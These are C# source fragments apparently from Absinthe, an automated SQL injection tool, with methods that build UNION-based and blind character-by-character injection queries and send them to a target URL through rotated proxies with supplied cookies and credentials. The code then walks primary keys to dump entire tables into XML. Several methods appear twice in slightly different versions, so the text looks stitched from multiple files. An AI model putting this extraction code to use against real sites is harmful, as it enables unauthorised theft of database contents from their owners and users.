// }}} // {{{ SelectValueForGivenPrimaryKey public string SelectValueForGivenPrimaryKey(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk) { StringBuilder retVal = new StringBuilder(); retVal.Append("SELECT TOP 1 ").Append(FieldName).Append(" FROM ").Append(TableName); retVal.Append(" WHERE ").Append(pk.Name).Append("=").Append(pk.Value); return(retVal.ToString()); }
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType) { StringBuilder WhereClause = new StringBuilder(); if (CurrentPrimaryKey.Name == KeyName) { WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value); } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString()); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); ResultText = ResultText.Substring(1, ResultText.Length - 2); string WorkingText = ""; switch (PrimaryKeyType) { case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText: case SqlDbType.NVarChar: case SqlDbType.Text: StringBuilder ElementBuilder = new StringBuilder(); //split char[] TextElements = ResultText.ToCharArray(); for (int i = 0; i < TextElements.Length; i++) { ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + "); } ElementBuilder.Remove(ElementBuilder.Length - 2, 2); // remove trailing '+ ' WorkingText = ElementBuilder.ToString(); break; default: WorkingText = ResultText.Trim(); break; } GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; retVal.Value = WorkingText; retVal.OutputValue = ResultText; return(retVal); }
// }}} // {{{ GetRecord private Hashtable GetRecord(string TableName, GlobalDS.Field[] Columns, GlobalDS.PrimaryKey pk) { int ColumnCounter; Hashtable retVal = new Hashtable(); for (ColumnCounter = 0; ColumnCounter < Columns.Length; ColumnCounter++) { DictionaryEntry de = GetFieldData(TableName, Columns[ColumnCounter], pk); retVal.Add(de.Key, de.Value); } return(retVal); }
// }}} // {{{ PullDataFromIndividualTable private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput) { List <Hashtable> retVal = new List <Hashtable>(); long RecordCounter = 0; GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length]; GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey(); int ColumnCounter = 0; string PrimaryKeyName = String.Empty; SqlDbType PrimaryKeyType = SqlDbType.Int; UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name)); // Generate Field List for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++) { UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName)); if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0) { ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter]; ColumnCounter++; } if (SrcTable.FieldList[FieldCounter].IsPrimary) { PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName; PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType; } } if (PrimaryKeyName.Length > 0) { for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++) { CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType); Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey); retVal.Add(Record); OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey); } } return(retVal); }
// }}} // {{{ SelectCharacterValueForConvertedRecordValue public string SelectCharacterValueForConvertedRecordValue(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk) { StringBuilder retVal = new StringBuilder(); retVal.Append("SELECT ASCII(SUBSTRING(CONVERT(VarChar,").Append(FieldName).Append("),").Append(Index); retVal.Append(",1)) FROM ").Append(TableName).Append(" WHERE ").Append(pk.Name).Append(" = ").Append(pk.Value); return(retVal.ToString()); }
// }}} // {{{ SelectLengthOfConvertedRecordValue public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk) { StringBuilder retVal = new StringBuilder(); retVal.Append("SELECT TOP 1 LENGTH(CONVERT(VarChar,").Append(FieldName).Append(")) FROM ").Append(TableName); retVal.Append(" WHERE ").Append(pk.Name).Append("=").Append(pk.Value); return(retVal.ToString()); }
// }}} // {{{ SelectCharacterValueForGivenPrimaryKey public string SelectCharacterValueForGivenPrimaryKey(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk) { StringBuilder retVal = new StringBuilder(); retVal.Append("SELECT ASCII(SUBSTR(").Append(FieldName).Append(",").Append(Index).Append(",1)) FROM "); retVal.Append(TableName).Append(" WHERE ").Append(pk.Name).Append("=").Append(pk.Value); return(retVal.ToString()); }
// }}} // {{{ SelectLengthOfConvertedRecordValue public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk) { StringBuilder retVal = new StringBuilder(); retVal.Append("SELECT LENGTH(TO_CHAR(").Append(FieldName).Append(")) FROM ").Append(TableName); retVal.Append(" WHERE ROWNUM=1 AND ").Append(pk.Name).Append("=").Append(pk.Value); return(retVal.ToString()); }
// }}} // {{{ GetFieldData private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk) { DictionaryEntry retVal = new DictionaryEntry(); retVal.Key = Column.FieldName; retVal.Value = string.Empty; if (Column.FieldName.Equals(pk.Name)) { retVal.Value = pk.Value; return(retVal); } StringBuilder SelectClause = new StringBuilder(); switch (Column.DataType) { case SqlDbType.BigInt: case SqlDbType.SmallInt: case SqlDbType.TinyInt: case SqlDbType.Int: case SqlDbType.Decimal: case SqlDbType.DateTime: case SqlDbType.Money: case SqlDbType.Float: case SqlDbType.Real: case SqlDbType.SmallDateTime: case SqlDbType.SmallMoney: case SqlDbType.Timestamp: case SqlDbType.UniqueIdentifier: //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.NChar: case SqlDbType.Char: case SqlDbType.NVarChar: case SqlDbType.Text: case SqlDbType.NText: case SqlDbType.VarChar: //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.Bit: //retVal.Value = GetBitField(Column.FieldName, TableName, pk); SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)"); break; case SqlDbType.Image: case SqlDbType.Binary: case SqlDbType.VarBinary: // TODO: Figure out how to support this! //retVal.Value = null; break; } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin); retVal.Value = ResultText.Substring(1, ResultText.Length - 2); return(retVal); }
private void OutputRecordToFile(ref XmlTextWriter xOutput, Hashtable DataRecord, GlobalDS.PrimaryKey pk) { xOutput.WriteStartElement("DataRecord"); xOutput.WriteStartAttribute("PrimaryKey", null); xOutput.WriteString(pk.Name); xOutput.WriteEndAttribute(); xOutput.WriteStartAttribute("PrimaryKeyValue", null); xOutput.WriteString(pk.OutputValue); xOutput.WriteEndAttribute(); foreach (string Key in DataRecord.Keys) { xOutput.WriteStartElement(Key); xOutput.WriteString(DataRecord[Key].ToString()); xOutput.WriteEndElement(); } xOutput.WriteEndElement(); }
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType) { StringBuilder WhereClause = new StringBuilder(); if (CurrentPrimaryKey.Name == KeyName) { WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value); } _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString()); string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent); string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin); ResultText = ResultText.Substring(1, ResultText.Length-2); string WorkingText = ""; switch(PrimaryKeyType) { case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText: case SqlDbType.NVarChar: case SqlDbType.Text: StringBuilder ElementBuilder = new StringBuilder(); //split char[] TextElements = ResultText.ToCharArray(); for (int i=0; i < TextElements.Length; i++) { ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + "); } ElementBuilder.Remove(ElementBuilder.Length -2,2); // remove trailing '+ ' WorkingText = ElementBuilder.ToString(); break; default: WorkingText = ResultText.Trim(); break; } GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; retVal.Value = WorkingText; retVal.OutputValue = ResultText; return retVal; }
// }}} // {{{ PullDataFromIndividualTable private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput) { List<Hashtable> retVal = new List<Hashtable>(); long RecordCounter = 0; GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length]; GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey(); int ColumnCounter = 0; string PrimaryKeyName = String.Empty; SqlDbType PrimaryKeyType= SqlDbType.Int; UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name)); // Generate Field List for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++) { UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName)); if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0) { ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter]; ColumnCounter++; } if (SrcTable.FieldList[FieldCounter].IsPrimary) { PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName; PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType; } } if (PrimaryKeyName.Length > 0) { for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++) { CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType); Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey); retVal.Add(Record); OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey); } } return retVal; }
// }}} // {{{ IterateIntegerPrimaryKey private GlobalDS.PrimaryKey IterateIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey) { StringBuilder CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); if (CurrentPrimaryKey.Name == KeyName) { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value))); } else { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName))); } // Is there a way to force this to be numeric?! long Result = RecursiveSearch(1,0,CurrentVector.ToString()); GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; retVal.Value = Result.ToString(); retVal.OutputValue = Result.ToString(); return retVal; }
// }}} // {{{ IterateNonIntegerPrimaryKey private GlobalDS.PrimaryKey IterateNonIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey) { StringBuilder CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); if (CurrentPrimaryKey.Name == KeyName) { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value))); } else { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName))); } long Size = RecursiveSearch(1,0,CurrentVector.ToString()); StringBuilder KeyValueBuilder = new StringBuilder(); StringBuilder KeyOutputValueBuilder = new StringBuilder(); for (long AscCounter = 1; AscCounter <= Size; AscCounter++) { CurrentVector = new StringBuilder(); CurrentVector.Append(_VectorBuffer); if (CurrentPrimaryKey.Name == KeyName) { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName, CurrentPrimaryKey.Value))); } else { CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName))); } long SearchVal = RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString()); KeyValueBuilder.Append(_PluginData.CharConversionFunction(SearchVal)).Append(_PluginData.ConcatenationCharacter); KeyOutputValueBuilder.Append(Convert.ToChar(SearchVal)); } KeyValueBuilder.Remove(KeyValueBuilder.Length - _PluginData.ConcatenationCharacter.Length, _PluginData.ConcatenationCharacter.Length); GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey(); retVal.Name = KeyName; //TODO: We should escape this with apostrophes most likely retVal.Value = KeyValueBuilder.ToString(); retVal.OutputValue = KeyOutputValueBuilder.ToString(); return retVal; }